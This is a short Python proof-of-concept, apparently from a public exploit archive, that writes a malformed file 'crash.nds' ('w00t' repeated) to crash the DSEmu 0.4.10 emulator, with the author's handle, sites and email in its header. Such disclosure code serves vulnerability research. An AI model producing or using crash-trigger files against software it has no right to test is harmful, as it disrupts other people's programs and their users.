10 lines
No EOL
250 B
Python
Executable file
10 lines
No EOL
250 B
Python
Executable file
#!/usr/bin/env python
|
|
#DSEmu 0.4.10 (.nds) local crash
|
|
#Author: l3D
|
|
#Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
|
|
#IRC: irc://irc.nix.co.il
|
|
#Email: pupipup33@gmail.com
|
|
|
|
blah=open('crash.nds', 'w')
|
|
blah.write('w00t'*12)
|
|
blah.close() |